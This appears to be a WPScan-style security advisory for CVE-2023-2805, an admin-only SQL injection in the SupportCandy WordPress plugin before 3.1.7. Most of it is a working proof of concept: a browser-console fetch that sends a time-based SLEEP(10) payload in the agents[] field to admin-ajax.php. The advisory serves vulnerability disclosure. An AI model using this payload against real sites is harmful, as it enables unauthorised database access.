SupportCandy < 3.1.7 – Admin+ SQLi | CVE 2023-2805

Description

The plugin does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

1. As an admin user, go to Support > Support Agents > Leaves. Click on a date in the calendar to open the "Add new" modal.
2. Run the following code in the browser console and note that response is delayed by 10 seconds:

await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=---------------------------400140094426688388811654736371",
    },
    "body": `-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"agents[]\"\r\n\r\nSELECT SLEEP(10)\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"is-recurring\"\r\n\r\n0\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwpsc_set_add_agent_leaves\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"_ajax_nonce\"\r\n\r\n${document.getElementsByName('_ajax_nonce')[0].value }\r\n-----------------------------400140094426688388811654736371\r\nContent-Disposition: form-data; name=\"dateSelected\"\r\n\r\n2023-05-16\r\n-----------------------------400140094426688388811654736371--\r\n`,
    "method": "POST",
});